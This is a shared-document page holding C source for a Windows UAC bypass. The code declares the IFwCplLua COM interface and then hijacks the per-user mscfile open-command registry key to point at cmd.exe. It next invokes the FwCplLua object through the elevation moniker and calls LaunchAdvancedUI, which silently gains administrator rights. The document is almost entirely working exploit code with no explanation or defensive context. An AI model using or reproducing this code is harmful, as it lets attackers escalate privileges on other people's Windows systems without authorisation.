Вы находитесь на странице: 1из 6

UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack

typedef struct
IFwCplLuaInterfaceVtbl
{

BEGIN_INTERFACE

HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);

ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IFwCplLua * This);

ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in IFwCplLua * This);

HRESULT(STDMETHODCALLTYPE *LaunchAdvancedUI)(
__RPC__in IFwCplLua * This);
END_INTERFACE

} *PIFwCplLuaInterfaceVtbl;

interface IFwCplLua
{
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl;
};

#define T_CLSID_FwCplLua L"{752438CB-E941-


433F-BCB4-8B7D2329F0C8}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-
45DF-8768-664147864573}"

BOOL Method42b_Test(
LPWSTR lpszPayload
)
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;

LPWSTR lpBuffer = NULL;


LRESULT lResult;
HKEY hKey = NULL;
SIZE_T sz = 0;

IID xIIDFwCplLua;
IFwCplLua *FwCplLua = NULL;
BIND_OPTS3 bop;

WCHAR szBuffer[MAX_PATH + 1];


WCHAR szElevationMoniker[MAX_PATH];

do {
if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK)
{
break;
}

_strcpy(szBuffer, L"C:\\windows\\system32\\cmd.exe");
lpBuffer = szBuffer;
sz = _strlen(lpBuffer);
if (sz == 0)
break;

lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
L"Software\\Classes\\mscfile\\shell\\open\\command",
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
&hKey,
NULL);

if (lResult != ERROR_SUCCESS)
break;

sz = (1 + sz) * sizeof(WCHAR);
lResult = RegSetValueEx(
hKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)lpBuffer,
(DWORD)sz);

if (lResult != ERROR_SUCCESS)
break;
RegCloseKey(hKey);
hKey = NULL;

_strcpy(szElevationMoniker,
L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_FwCplLua);

RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;

r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop,


&xIIDFwCplLua, &FwCplLua);
if (r != S_OK)
break;

if (FwCplLua == NULL) {
r = E_FAIL;
break;
}

r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);

} while (bCond);

if (hKey != NULL)
RegCloseKey(hKey);

if (FwCplLua != NULL) {
FwCplLua->lpVtbl->Release(FwCplLua);
}

return SUCCEEDED(r);
}